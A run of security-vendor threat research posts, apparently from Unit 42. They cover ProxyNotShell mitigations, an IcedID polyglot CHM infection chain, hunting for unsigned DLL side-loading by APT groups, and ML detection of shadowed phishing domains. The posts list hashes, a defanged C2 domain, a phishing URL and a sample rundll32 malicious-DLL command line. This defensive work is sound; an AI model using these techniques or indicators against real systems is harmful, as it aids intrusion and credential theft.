Microsoft has yet to release a patch for these vulnerabilities. In the meantime, they provided mitigations that rely on the usage of a URL Rewrite rule to identify and block exploitation attempts as well as disabling remote PowerShell access for non-admins.

GTSC provided the same guidance in their blog as well. If you feel you may have been targeted and keep IIS logs, GTSC recommends running the following PowerShell command to search for evidence of attempted exploitation of your Exchange servers:

Cortex XDR customers can search for signs of exploitation by employing the queries included in the following section of this brief. The queries include evidence of certutil connections to public IPs, evidence of DLL and EXE writes to C:\Users\Public\, evidence of China Chopper webshell activity, and the addition of suspicious files to Exchange directories.

Unit 42 Managed Threat Hunting Queries

The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit these CVEs across our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of exploitation.

Conclusion

Based on the amount of publicly available information, the ease of use and the extreme effectiveness of this exploit, Palo Alto Networks highly recommends following Microsoft’s guidance to protect your organization until a patch is issued to fix the problem. Palo Alto Networks and Unit 42 will continue to monitor the situation for updated information, release of proof-of-concept code and evidence of more widespread exploitation.

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

Next-Generation Firewalls (PA-Series, VM-Series and CN-Series) or Prisma Access with an Advanced Threat Prevention security subscription can automatically block sessions related to CVE-2022-41040 using Threat ID 91368 (Application and Threat content update 8624).

Cortex XSOAR has released a response pack and playbook for the ProxyNotShell CVEs to help automate and speed the mitigation process.

This playbook automates the following tasks:

  • Collection of Microsoft mitigation tools, detection rules and Microsoft Global Technical Support Center (GTSC) indicators
  • Extraction of these indicators and tagging to incidents
  • Hunting for exploitation patterns using Cortex XDR-XQL queries
  • Hunting for exploitation patterns using the following SIEM products:
    • Azure Sentinel
    • Splunk
    • QRadar
    • Elasticsearch
  • Indicator hunting using PAN-OS, Splunk and QRadar
  • Mitigation actions such as deploying detection rules and recommended workarounds
Portion of the ProxyNotShell Cortex XSOAR playbook illustrating collection and extraction of indicators and rules.
Figure 1. Portion of the playbook illustrating collection and extraction of indicators and rules.
Portion of the ProxyNotShell Cortex XSOAR playbook illustrating SIEM threat hunting.
Figure 2. Portion of the playbook illustrating SIEM threat hunting.
Portion of the ProxyNotShell Cortex XSOAR playbook illustrating Cortex XDR-XQL Threat Hunting.
Figure 3. Portion of the playbook illustrating Cortex XDR-XQL Threat Hunting.

See the Cortex XSOAR page on CVE-2022-41040 & CVE-2022-41082 - ProxyNotShell for details on the pack. To find out about other Cortex XSOAR packs and playbooks, visit our Cortex XSOAR Developer Docs reference page.

Cortex Xpanse has the ability to identify and detect Microsoft Exchange servers that may be a part of your attack surface or the attack surface of third-party partners connected to your organization.

Cortex XDR agent running on version 7.7 with content version 710-19877 and above will report the exploitation attempt of the exploitation chain that we have identified.

To ensure you are receiving alerts and monitoring any exploitation attempts:

  • Verify that you are using Cortex XDR agent version 7.7 (or newer)
  • Verify that your agent is on content update 710-19877 (or newer)
  • Perform an agent heartbeat
  • Restart Microsoft Internet Information Services (IIS) using the command: “iisreset”

A new Behavioral Threat Protection (BTP) rule has been added to notify XDR customers about exploitation attempts:

The alert can be displayed in two forms, depending on whether you enabled ‘Informative BTP Alerts’ in the agent configuration

Alert name Alert Description
Informative BTP Alerts enabled  Webserver Exploitation - 286099623 Exchange ProxyNotShell CVE-2022-41040 variant - Behavioral threat detected (rule: bioc.sync.exchange_proxynotshell_cve_2022_41040)
Informative BTP Alerts disabled Behavioral Threat Detected Behavioral threat detected (rule: bioc.sync.exchange_proxynotshell_cve_2022_41040)

As part of the Cortex XDR multi-layer protection approach, additional already existing Behavioral Threat Protection rules are capable of detecting and preventing the dropping of malicious webshells from a Microsoft Exchange server; those will come into effect until the rule above goes into block mode in the near future.

The malicious URLs and IPs have been released to Advanced URL Filtering and Built-in External Dynamic Lists, respectively.

Prisma Cloud Web-Application and API Security (WAAS) customers receive protections from this threat through the ProxyShell custom rule.

If you think you may have been compromised or have an urgent matter, you can get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

As further information emerges or additional detections and protections are put into place, Palo Alto Networks will update this publication accordingly.

Updated Oct. 11, 2022, at 1:30 p.m. PT.

More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID

Executive Summary

Unit 42 recently observed a polyglot Microsoft Compiled HTML Help (CHM) file being employed in the infection process used by the information stealer IcedID. We will show how to analyze the polyglot CHM file and the final payload so you can understand how the sample evades detection.

Multiple attack groups such as Starchy Taurus (aka APT41) and Evasive Serpens (formerly tracked as OilRig, also known as Europium) have abused CHM files to conceal payloads written using PowerShell or JavaScript. Here, we describe an interesting attack that allows attackers to avoid the need for long lines of code, which can make it easier for malicious files to evade detection by security products. Polyglot files can be abused by attackers to hide from anti-malware systems that rely on file format identification. The technique involves executing the same CHM file twice in the infection process. The first execution exhibits benign activities, while the second execution stealthily carries out malicious behaviors.

This particular attack chain was discovered in early August 2022 and delivered IcedID, also known as Bokbot, as the final payload. This information stealer, IcedID, is well-known malware that has been attacking users since 2019.

Palo Alto Networks customers receive protections from malware families using similar anti-analysis techniques with Cortex XDR or the Next-Generation Firewall with cloud-delivered security services including WildFire, Advanced Threat Prevention, Advanced URL Filtering and DNS Security.

Related Unit 42 Topics Malware, IcedID, Evasion

Malicious Polyglot CHM File

Polyglot files are binaries that have multiple different file format types. The file would have a different behavior depending on the application that was used to execute it.

The attack that was discovered in early August 2022 starts with a phishing email that includes an attached zip file named erosstrucking-file-08.08.2022.zip. The zip file decompresses into an ISO image file named order-130722.28554.iso. Inside the ISO file is a CHM file called pss10r.chm (SHA256: 3d279aa8f56e468a014a916362540975958b9e9172d658eb57065a8a230632fa). The polyglot CHM file is used to display help documentation. When the user launches the CHM file (pss10r.chm), a harmless help window is displayed.

Decoy HTML help window appears to contain a message from Microsoft Customer Service and Support as shown.
Figure 1. Decoy HTML help window.

To dump the contents of the CHM file, we used 7zip. The file of interest is PSSXMicrosoftSupportServices_HP05221271.htm.

Contents of the decoy HTML help window include PSSXMicrosoftSupportServices_HP05221271.htm, the file of interest.
Figure 2. Contents of the decoy HTML help window.

Most of the code in the HTML file is used for generating the decoy window. However, concealed within the HTML code is a single-line command to execute the same CHM file again. The command calls Mshta.exe to execute itself (pss10r.chm) a second time. Mshta.exe is a utility that executes Microsoft HTML Application (HTA) files. HTAs are full-fledged applications created using HTML.

The line shown calls mshta to execute pss10r.chm a second time.
Figure 3. A line of HTML code in PSSXMicrosoftSupportServices_HP05221271.htm that calls Mshta.exe to execute the CHM file a second time.

The code of the HTA is buried within the binary of the CHM file and configured to be invisible to the victim during execution. The HTA is used to execute the binary app.dll. 

A screenshot showing the HTA code buried in pss10r.chm. This is used to execute the binary app.dll
Figure 4. HTA code buried in pss10r.chm.

The binary app.dll is actually hidden within the ISO image. The hidden binary can be revealed using the attrib command.

The screenshot shows how the attrib command reveals the hidden binary
Figure 5. Revealing the hidden binary.

The app.dll binary is a 64-bit IcedID DLL. (SHA256: d240bd25a0516bf1a6f6b3f080b8d649ed2b116c145dd919f65c05d20fc73131)

IcedID DLL’s Configuration Extraction

To retrieve the indicators of compromise (IoCs) from the IcedID DLL, we looked at its configuration. The IcedID DLL’s configuration is encoded and stored in the data section of the binary. The encoded configuration has the format shown in Figure 6.

Encoded configuration of the IcedID DLL.
Figure 6. Structure of encoded configuration blob.

The following function would decode the IcedID DLL’s configuration at runtime. The address of the encoded configuration (enc_config) is in the function.

IcedID DLL's configuration decoder function.
Figure 7. IcedID DLL’s configuration decoder function.

The decoded IcedID DLL’s configuration has the following format.

Structure of decoded IcedID configuration.
Figure 8. Structure of decoded IcedID configuration.

From the decoded configuration, we can extract the following IoCs:

Command and Control URL abegelkunic[.]com
Campaign ID 4157420015

Conclusion

Threat actors continue to evolve their techniques to evade detection. The above analysis demonstrates how attackers abused a polyglot Microsoft Compiled HTML file to deliver an IcedID payload. It is important for defenders not to trust binaries based on their file types since polyglot files such as the one discussed here have more than one correct file type.

Palo Alto Networks customers receive protections from malware families using similar anti-analysis techniques with Cortex XDR or the Next-Generation Firewall with cloud-delivered security services including WildFire, Advanced Threat Prevention, Advanced URL Filtering and DNS Security.

Indicators of Compromise

File name: erosstrucking-file-08.08.2022.zip
SHA256: fb6d23f69d14d474ce096da4dcfea27a84c93f42c96f6dd8295d33ef2845b6c7

File name: order-130722.28554.iso
SHA256:
d403df3fb181560d6ebf4885b538c5af86e718fecfabc73219b64924d74dd0eb

File name: pss10r.chm
SHA256: 3d279aa8f56e468a014a916362540975958b9e9172d658eb57065a8a230632fa

File name: app.dll
SHA256: d240bd25a0516bf1a6f6b3f080b8d649ed2b116c145dd919f65c05d20fc73131

Command and Control URL: abegelkunic[.]com

 

Additional Resources

Harmful Help: Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla

 

Hunting for Unsigned DLLs to Find APTs

Executive Summary

Malware authors regularly evolve their techniques to evade detection and execute more sophisticated attacks. We’ve commonly observed one method over the past few years: unsigned DLL loading.

Assuming that this method might be used by advanced persistent threats (APTs), we hunted for it. The hunt revealed sophisticated payloads and APT groups in the wild, including the Chinese cyberespionage group Stately Taurus (formerly known as PKPLUG, aka Mustang Panda) and the North Korean Selective Pisces (aka Lazarus Group).

Below, we show how hunting for the loading of unsigned DLLs can help you identify attacks and threat actors in your environment.

Palo Alto Networks customers receive protections and detections against malicious DLL loading through the Cortex XDR agent.

Threat Actor Groups Discussed
Unit 42 tracks group as… Group also known as…
Stately Taurus Mustang Panda, PKPLUG, BRONZE PRESIDENT, HoneyMyte, Red Lich, Baijiu
Selective Pisces Lazarus Group, ZINC, APT - C - 26

Malicious DLLs: A Common Method Attackers Use for Executing Malicious Payloads on Infected Systems

Based on our observations over years of proactive threat-hunting experience, we hypothesize that one of the main methods for executing malicious payloads on infected systems is loading a malicious DLL. As both individual hackers and APT groups use this method, we decided to conduct research based on this hypothesis.

Most of the malicious DLLs we observe in the wild share three common characteristics:

  • The DLLs are mostly written to unprivileged paths.
  • The DLLs are unsigned.
  • To evade detection, the DLLs are loaded by a signed process, whether a utility dedicated to loading DLLs (such as rundll32.exe) or an executable that loads DLLs as part of its activity.

With that in mind, we found that the most common techniques that are being used by threat actors in the wild are the following:

  1. DLL loading by rundll32.exe/regsvr32.exe – While those processes are signed and known binaries, threat actors abuse them to achieve code execution in an attempt to evade detection.
  2. DLL order hijacking – This refers to loading a malicious DLL by abusing the search order of a legitimate process. This way, a benign application will load a malicious payload with the name of a known DLL.

Reviewing the results of the above techniques in the wild revealed that the most common unprivileged paths to load malicious unsigned DLLs are the folders and sub-folders of ProgramData, AppData and the users’ home directories.

The next section will introduce several findings based on the above hypothesis.

Attack Trends in the Wild Related to Unsigned DLLs

To start hunting based on the hypothesis we described, we created two XQL queries. The first one looks for unsigned DLLs that were loaded by rundll32.exe/regsvr32.exe, while the other looks for signed software that loads an unsigned DLL.

The hunting activity revealed various malware families that used unsigned DLL loading. Figure 1 presents the malware we detected using these methods over the past six months (February-August 2022).

Malware observed using DLL loading between February-August 2022: Raspberry Robin (31.0%), Emotet (17.4%), QakBot (15.5%), IcedID (9.7%), Cobalt Strike (7.8%), Vawtrak (6.8%), Ursnif (5.8%), Amavaldo (3.1%), Stately Taurus (1.9%), Selective Pisces (1.0%)
Figure 1. Malware observed using DLL loading.

Analyzing the execution techniques used by the above threats showed that banking trojans and individual threat actors typically used rundll32.exe or regsvr32.exe to load a malicious DLL, while APT groups used the DLL side-loading technique most of the time.

Diving Into Selected Payloads

Stately Taurus

We decided to highlight an investigation around Stately Taurus activity that we detected in the environment of one organization. Stately Taurus is a Chinese APT group that usually targets non-governmental organizations and is known for abusing legitimate software to load payloads.

In this case, we observed the usage of the DLL search order hijacking technique that enabled the attacker’s malicious DLL to load into the memory space of a legitimate process. The threat actor used multiple pieces of third party software for the DLL side-loading, such as antivirus software and a PDF reader.

The screenshot shows the benign exe file (AvastSvc.exe) that uses side-loading to load the malicious DLL wsc.dll
Figure 2. AvastSvc.exe uses side-loading to load a malicious DLL.

To achieve DLL side-loading, the group dropped the payload into the ProgramData folder, which contained three files – a benign EXE file for DLL hijacking (AvastSvc.exe), a DLL file (wsc.dll) and an encrypted payload (AvastAuth.dat). The loaded DLL appeared to be the PlugX RAT, which loads the encrypted payload from the .dat file.

The table shows the following: File Create - AvastAuth.dat - C:\ProgramData\AvastSvcZEg\AvastAuth.dat; File Write - wsc.dll - C:\ProgramData\AvastSvcZEg\wsc.dll; File Write - wsc.dll - C:\ProgramData\AvastSvcZEg\wsc.dll; File Create - wsc.dll - C:\ProgramData\AvastSvcZEg\wsc.dll; File Write - AvastSvc.exe - C:\ProgramData\AvastSvcZEg\AvastSvc.exe
Figure 3. PlugX files: benign executable, DLL loader and encrypted .dat file.

Selective Pisces

Among the results of our hunting queries, we also identified several high-entropy malicious modules within the ProgramData directories shown in Figure 4.

The screenshot shows high-entropy malicious modules associated with Selective Pisces, including uso.dat (0.999545), mi.dll (0.999396), mi.dll (0.999393), SXSHARED.DLL (0.999354), and USOShared.tmp (0.999317)
Figure 4. DLL side-loading by Selective Pisces.

Investigating the execution chain of the unsigned modules shown in Figure 4 revealed that they were dropped to the disk by the signed DreamSecurity MagicLine4NX process (MagicLine4NX.exe).

MagicLine4NX.exe executed a second-stage payload that we observed utilizing DLL side-loading in order to evade detection. The second-stage payload wrote a new DLL named mi.dll, and copied wsmprovhost.exe (host process for WinRM) to a random directory in ProgramData. Wsmprovhost.exe is a native Windows binary that attempts to load mi.dll from the same directory. The attackers abused this mechanism in order to achieve DLL side-loading (T1574.002) with this process.

The mi.dll payload was observed dropping a new payload named ualapi.dll to the System32 directory (C:\Windows\System32\ualapi.dll). As ualapi.dll is in this case a missing DLL on the System32 directory, the attackers used this fact to achieve persistence by giving their malicious payload the name ualapi.dll. That way, spoolsv.exe will load it upon startup.

After analyzing the payloads above, we attributed them to the North Korean APT group that Unit 42 tracks as Selective Pisces. This group’s utilization of legitimate third party-software such as MagicLine4NX was described earlier this year in a blog post by Symantec.

Raspberry Robin

The last attack we would like to elaborate on is the most common one we observed in the wild.
Some of the results that our query yields share several common characteristics:

  • DLLs with scrambled names reside in random sub-folders of the ProgramData or AppData folders.
  • Those DLLs have a similar range of entropy (~0.66).
  • All of them were loaded by rundll32.exe or regsvr32.exe

For example: RUNDLL32.EXE C:\ProgramData\<random_folder>\fhcplow_Tudjdm.dll,iarws_sbv

DLLs loaded by Raspberry Robin include npwmse_Nemcttdid.dll, iyclBaiic_fig.dll, Portsoft_Gdfv.dll, adlsoft_w_ni.dll, dfjssoft_002.dll, fhcplow_Tudjdm.dll, CNBERngs_De4_3.dll
Figure 5. DLLs loaded by Raspberry Robin.

The DLL loading activities that take place in those attacks were attributed to a campaign called Raspberry Robin, which was recently described by Red Canary.

Those attacks begin from a shortcut file on an infected USB device. This spawns msiexec.exe to retrieve the malicious DLL from a remote C2 server. Over installation, a scheduled task is created in order to achieve persistence, loading the DLL using rundll32.exe/regsvr32.exe on system start up.

Using Unsigned DLLs to Hunt for Attacks in Your Environment

You can hunt for the loading of unsigned DLLs using XQL Search in Cortex XDR.
To narrow down the results, we suggest focusing on the following:

  • For DLL side-loading, we recommend paying attention to known third-party software placed in non-standard directories.
  • Focus on the file’s entropy – binaries that have a high value of entropy may contain a packed section that will be extracted during execution.
  • Focus on the frequency of execution – high-frequency results may indicate a legitimate activity that occurs periodically, while low-frequency results may be a lead for an investigation.
  • Focus on the file’s path – results that contain folders or files with scrambled names are more suspicious than others.
Query results sorted by the module's entropy, showing how examples of Emotet execution rise when sorted in that way. Module entropy scores range from 0.860774 to 0.637715 in the examples shown here.
Figure 6. Query results sorted by the module’s entropy.

Figure 6 contains partial results of the queries that are mentioned in the next section, sorted by the module’s entropy. While the first two rows are an example of Emotet execution, the others are benign DLLs.

Hunting Queries

 

Conclusion

Most detection techniques for blocking malicious DLLs rely on the module's behavior after it has been loaded into memory. This can limit the ability to block all malicious modules.

That said, you can proactively hunt for malicious unsigned DLLs using hunting approaches such as the ones presented in this blog.

Knowing the baseline of your network in terms of legitimate software or behavior can reduce the number of results generated by the above queries, allowing you to focus on results that might be suspicious.

Cortex XDR alerts on and blocks malicious DLLs loaded by known hijacking techniques, and can also prevent post-exploitation activities, through the Behavioral Threat Protection and Analytics modules.

Indicators of compromise and TTPs associated with Stately Taurus can be found in the Stately Taurus ATOM.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, or Japan: +81.50.1790.0200.

Indicators of Compromise

Threat Actor SHA256
Selective Pisces 779a6772d4d35e1b0018a03b75cc6f992d79511321def35956f485debedf1493
Selective Pisces d9b1ad70c0a043d034f8eecd55a8290160227ea66780ccc65d0ffb2ebc2fb787
Selective Pisces 3131985fa7394fa9dbd9c9b26e15ac478a438a57617f1567dc32c35b388c2f60
Selective Pisces 5be717dc9eda4df099e090f2a59c25372d6775e7d6551b21f385cf372247c2fd
Selective Pisces 18cc18d02742da3fa88fc8c45fe915d58abb52d3183b270c0f84ae5ff68cf8a2
Selective Pisces 7aa62af5a55022fd89b3f0c025ea508128a03aab5bc7f92787b30a3e9bc5c6e4
Selective Pisces 79b7964bde948b70a7c3869d34fe5d5205e6259d77d9ac7451727d68a751aa7d
Selective Pisces cf9ccba037f807c5be523528ed25cee7fbe4733ec19189e393d17f92e76ffccc
Selective Pisces 32449fd81cc4f85213ed791478ec941075ff95bb544ba64fa08550dd8af77b69
Selective Pisces 5a8b1f003ae566a8e443623a18c1f1027ec46463c5c5b413c48d91ca1181dbf7
Selective Pisces 5bb4950a05a46f7d377a3a8483484222a8ff59eafdf34460c4b1186984354cf9
Stately Taurus 352fb4985fdd150d251ff9e20ca14023eab4f2888e481cbd8370c4ed40cfbb9a
Stately Taurus 6491c646397025bf02709f1bd3025f1622abdc89b550ac38ce6fac938353b954
Stately Taurus e8f55d0f327fd1d5f26428b890ef7fe878e135d494acda24ef01c695a2e9136d
Raspberry Robin 06f11ea2d7d566e33ed414993da00ac205793af6851a2d6f809ff845a2b39f57
Raspberry Robin 202dab603585f600dbd884cb5bd5bf010d66cab9133b323c50b050cc1d6a1795
Raspberry Robin f9e4627733e034cfc1c589afd2f6558a158a349290c9ea772d338c38d5a02f0e
Raspberry Robin 9fad2f59737721c26fc2a125e18dd67b92493a1220a8bbda91e073c0441437a9
Raspberry Robin 9973045c0489a0382db84aef6356414ef29814334ecbf6639f55c3bec4f8738f

Table 1. Hashes of samples.

 

Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime

Executive Summary

Cybercriminals compromise domain names to attack the owners or users of the domains directly, or use them for various nefarious endeavors, including phishing, malware distribution, and command and control (C2) operations. A special case of DNS hijacking is called domain shadowing, where attackers stealthily create malicious subdomains under compromised domain names. Shadowed domains do not affect the normal operation of the compromised domains, making it hard for victims to detect them. The inconspicuousness of these subdomains often allows perpetrators to take advantage of the compromised domain’s benign reputation for a long time.

Current threat research-based detection approaches are labor-intensive and slow as they rely on the discovery of malicious campaigns that use shadowed domains before they can look for related domains in various data sets. To address these issues, we designed and implemented an automated pipeline that can detect shadowed domains faster on a large scale for campaigns that are not yet known. Our system processes terabytes of passive DNS logs every day to extract features about candidate shadowed domains. Building on these features, it uses a high-precision machine learning model to identify shadowed domain names. Our model finds hundreds of shadowed domains created daily under dozens of compromised domain names.

Emphasizing the difficulty of discovering shadowed domains, we found that only 200 domains were marked as malicious by vendors on VirusTotal out of 12,197 shadowed domains automatically detected by us between April 25 and June 27, 2022. As an example, we give a detailed account of a phishing campaign leveraging 649 shadowed subdomains under 16 compromised domains such as bancobpmmavfhxcc.barwonbluff.com[.]au and carriernhoousvz.brisbanegateway[.]com. The perpetrators leveraged the benign reputation of these domains to spread fake login pages harvesting credentials. VT vendor performance is much better for this specific campaign, marking as malicious 151 out of the 649 shadowed domains – but still less than one quarter of all the domains.

Palo Alto Networks provides protection against shadowed domains leveraging our automated classifier in multiple Palo Alto Networks Next-Generation Firewall cloud-delivered security services, including DNS Security and Advanced URL Filtering. Additionally, customers can leverage Cortex XDR to alert on and respond to domain shadowing when used for C2 communications.

Related Unit 42 Topics DNS Security, Credential Harvesting

How Domain Shadowing Works

Cybercriminals use domain names for various nefarious purposes, including communication with C2 servers, malware distribution, scams and phishing. To help perpetrate these activities, crooks can either purchase domain names (malicious registration) or compromise existing ones (DNS hijacking/compromise). Avenues for criminals to compromise a domain name include stealing the login credential of the domain owner at the registrar or DNS service provider, compromising the registrar or DNS service provider, compromising the DNS server itself, or abusing dangling domains.

Domain shadowing is a subcategory of DNS hijacking, where attackers attempt to stay unnoticed. First, cybercriminals stealthily insert subdomains under the compromised domain name. Second, they keep existing records to allow the normal operation of services such as websites, email servers and any other services using the compromised domain. By ensuring the undisturbed operation of existing services, the criminals make the compromise inconspicuous to the domain owners and the cleanup of malicious entries unlikely. As a result, domain shadowing provides attackers access to virtually unlimited subdomains inheriting the compromised domain’s benign reputation.

When attackers change the DNS records of existing domain names, they aim to target the owners or users of these domain names. However, criminals often use shadowed domains as part of their infrastructure to support endeavors such as generic phishing campaigns or botnet operations. In the case of phishing, crooks can use shadowed domains as the initial domain in a phishing email, as an intermediate node in a malicious redirection (e.g., in a malicious traffic distribution system), or as a landing page hosting the phishing website. In the case of botnet operations, a shadowed domain can be used, for example, as a proxy domain to conceal C2 communication.

In Table 1, we collect example shadowed domains used as part of a recent phishing campaign automatically discovered by our detector. The attackers compromised several domain names that have existed for many years and thus built up a good reputation. We can observe that the IP addresses of these domains (and IPs of their benign subdomains) are located in either Australia (AU) or the United States (US). Suspiciously, all the shadowed domains have IP addresses located in Russia (RU) – a different country and autonomous system from the parent domains. Furthermore, all shadowed domains in this campaign use an IP address from the same /24 IP subnet (the first three numbers are the same in the IP address). An additional indicator of malice we noticed is that all the malicious subdomains shown were activated around the same time and were operational for a relatively short period.

FQDN IP Address CC First Seen Last Seen Time Active*
halont.edu[.]au 103.152.248[.]148 AU 2020-11-23 2022-06-28 ~ 9 years
training.halont.edu[.]au 103.152.248[.]148 AU 2020-12-08 2021-05-02 ~ 7 years
training.halont.edu[.]au** 62.204.41[.]218 RU 2022-04-17 2022-05-06 < 1 month
ocwdvmjjj78krus.halont.edu[.]au 62.204.41[.]218 RU 2022-04-04 2022-04-04 < 1 day
baqrxmgfr39mfpp.halont.edu[.]au 62.204.41[.]218 RU 2022-04-01 2022-04-01 < 1 day
barwonbluff.com[.]au 27.131.74[.]5 AU 2018-12-13 2022-06-28 ~ 19 years
bancobpmmavfhxcc.barwonbluff.com[.]au 62.204.41[.]247 RU 2022-03-07 2022-06-06 ~ 3 months
tomsvprfudhd.barwonbluff.com[.]au 62.204.41[.]77 RU 2022-03-07 2022-03-07 < 1 day
brisbanegateway[.]com 101.0.112[.]230 AU 2015-04-23 2022-06-24 ~ 12 years
carriernhoousvz.brisbanegateway[.]com 62.204.41[.]218 RU 2022-03-07 2022-03-08 ~ 2 days
vembanadhouse[.]com 162.215.253[.]110 US 2019-09-04 2022-06-28 ~ 17 years
wiguhllnz43wxvq.vembanadhouse[.]com 62.204.41[.]218 RU 2022-03-25 2022-03-25 < 1 day

Table 1. Example of compromised domains and their shadowed subdomains. *Time active column is based on the time first seen in pDNS, Whois, or archive.org. **It seems that the subdomain training.halont.edu[.]au was deactivated, and later the attacker accidentally hijacked it via DNS wildcarding. FQDN stands for Fully Qualified Domain Name and CC stands for the country-code of the IP address.

How to Detect Domain Shadowing

To address issues with threat hunting-based approaches to detect shadowed domains – such as lack of coverage, delay in detection and the need for human labor – we designed a detection pipeline leveraging passive DNS traffic logs (pDNS) based on work by Liu et al. Building on observations similar to the ones discussed in Table 1, we extracted over 300 features that could signal potential shadowed domains. Using these features, we trained a machine learning classifier that is the core of our detection pipeline.

Design Approach for the Machine Learning Classifier

We can arrange the features into three groups – those specific to the candidate shadowed domain itself, those related to the candidate shadowed domain’s root domain and those related to the IP addresses of the candidate shadowed domain.

The first group is specific to the candidate shadowed domain itself. Examples of these FQDN-level features include:

  • Deviation of the IP address from the root domain’s IP (and its country/autonomous system).
  • Difference in the first seen date compared to the root domain’s first seen date.
  • Whether the subdomain is popular.

The second feature group describes the candidate shadowed domain's root domain. Examples are:

  • The ratio of popular to all subdomains of the root.
  • The average IP deviation of subdomains.
  • The average number of days subdomains are active.

The third group of features is about the IP addresses of the candidate shadowed domain, for example:

  • The apex domain to FQDN ratio on the IP.
  • The average IP country deviation of subdomains using that IP.

As we generate over 300 features – where many of them are highly correlated – we perform feature selection in order to use only the features that will contribute most to the machine learning classifer’s performance. We use the Chi-squared test to find the best features individually and mutual Pearson correlation to decrease the weight of highly correlated features.

We can select classifiers with different performance and complexity tradeoffs depending on the desired use case. Using a random forest classifier, we can achieve 99.99% accuracy, 99.92% precision and 99.87% recall using only the 64 best features and allowing each of 200 trees in the random forest to use at most eight features and to have a maximum depth of four. A simpler classifier – using only the top 32 features where each tree can only use at most four features and have a depth of two – can achieve 99.78% accuracy, 99.87% precision and 92.58% recall.

During a two-month period, our classifier found 12,197 shadowed domains averaging a couple hundred detections every day. Looking at these domains in VirusTotal, we find that only 200 were marked as malicious by at least one vendor. We conclude from these results that domain shadowing is an active threat to the enterprise, and it is hard to detect without leveraging automated machine learning algorithms that can analyze large amounts of DNS logs.

A Phishing Campaign Using Shadowed Domains

Next, we dive deeper into the phishing campaign we used as an example in Table 1. Clustering – based on IP address and root domains – the results from our detector, we found 649 shadowed domains created under 16 compromised domain names for this campaign. Figure 1 is a screenshot of barwonbluff.com[.]au, one of the compromised domains. Even though it seems to operate normally, attackers have created many subdomains under it that they can use in phishing links such as hxxps[:]//snaitechbumxzzwt.barwonbluff[.]com.au/bumxzzwt/xxx.yyy@target.it.

The screenshot shows an image of the Barwon Bluff in Australia and represents an orginally benign domain and legitimate website.
Figure 1. Screenshot of barwonbluff.com[.]au – an originally benign domain.
When users click on the above phishing URL, they are redirected to a landing page, as shown in Figure 2. The phishing page on login.elitepackagingblog[.]com wants to steal Microsoft user credentials. To avoid falling for similar phishing attacks, users need to check the domain name of the website they are visiting and the lock icon next to the URL bar before entering their credentials.

The screenshot shows a page designed to look like a Microsoft login page, but the lock and domain shown in the URL bar do not connect to a Microsoft domain.
Figure 2. Screenshot of the phishing landing page on elitepackagingblog[.]com, where victims are redirected from the snaitechbumxzzwt.barwonbluff[.]com.au shadowed domain. Source: Joe Sandbox.
Figure 3 is a screenshot of halont.edu[.]au after the website owners found out that their domain name was compromised. Unfortunately, we observed many shadowed domains created under this domain name before the owners realized it was hacked. These cases further emphasize the necessity to automatically detect these domains because it is hard for domain owners to discover that they are compromised.

The screenshot shows a progress bar and launch date, along with a title that reads, "Yes, we've been hacked, and are rebuilding."
Figure 3. Screenshot of halont.edu[.]au, an originally benign domain that is being rebuilt after compromise.

Conclusion

Cybercriminals use shadowed domains for various illicit ventures, including phishing and botnet operations. We observe that it is challenging to detect shadowed domains as vendors on VirusTotal cover less than 2% of these domains. As traditional approaches based on threat research are too slow and fail to uncover the majority of shadowed domains, we turn to an automated detection system based on pDNS data. Our high-precision machine learning-based detector processes terabytes of DNS logs and discovers hundreds of shadowed domains daily. Palo Alto Networks offers multiple security subscriptions – including DNS Security and Advanced URL Filtering – that leverage our detector to protect against shadowed domains. Additionally, customers can leverage Cortex XDR to alert on and respond to domain shadowing when used for command and control communications.

Acknowledgements

We want to thank Wei Wang and Erica Naone for their invaluable input on this blog post.

Indicators of Compromise

halont.edu[.]au
training.halont.edu[.]au
ocwdvmjjj78krus.halont.edu[.]au
baqrxmgfr39mfpp.halont.edu[.]au
barwonbluff.com[.]au
bancobpmmavfhxcc.barwonbluff.com[.]au
snaitechbumxzzwt.barwonbluff[.]com.au
snaitechbumxzzwt.barwonbluff.com[.]au/bumxzzwt/xxx.yyy@target.it
tomsvprfudhd.barwonbluff.com[.]au
brisbanegateway[.]com
carriernhoousvz.brisbanegateway[.]com
vembanadhouse[.]com
wiguhllnz43wxvq.vembanadhouse[.]com
login.elitepackagingblog[.]com
login.elitepackagingblog[.]com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=637823463352371687.MDY0MjMzYjMtOWNlZC00ODA5LWE1YWQtOWMyMTIwYTZiOTIwODZiNTMyN2MtZWQ3ZC00Mzg4LWJjMzktNGQxYjQ1MDFkNmNi&ui_locales=en-US&mkt=en-US&state=q81i2V5Z572r5P2TuEfGYg0HZLgy9vMW3HMxjfeMMm60rJIlPgKe4SKR8D86gIjkNlgD6cd8jK754mEWDiHZtRQ1pzeGpqaVJOCkSmAUGOWUcOxbKCr2sPnoBds6H7fZCJdLqcotpA2NF3vvVbRDSSWk3xhQuxnXOoJoN2pj0RhiR97YEUkUwqEEsCoboffTLGgVrjaDy_ASgmhE_7mkvYE6YsXicgxoEzDqhrjxB_vFcTt_u7o1rrAYcWIv-0vZ4vPVToJ7Nwqlf6BHPz7zPQ&x-client-SKU=ID_NETSTANDARD2_0&x-client-ver=6.12.1.0&sso_reload=true#ODQuMTccGFvbGEucGVsbGVnYXRhQHNuYWl0ZWNoLml0=

Additional Resources

Don’t Let One Rotten Apple Spoil the Whole Barrel: Towards Automated Detection of Shadowed Domains

 

Zero-Day Exploit Detection Using Machine Learning

Executive Summary

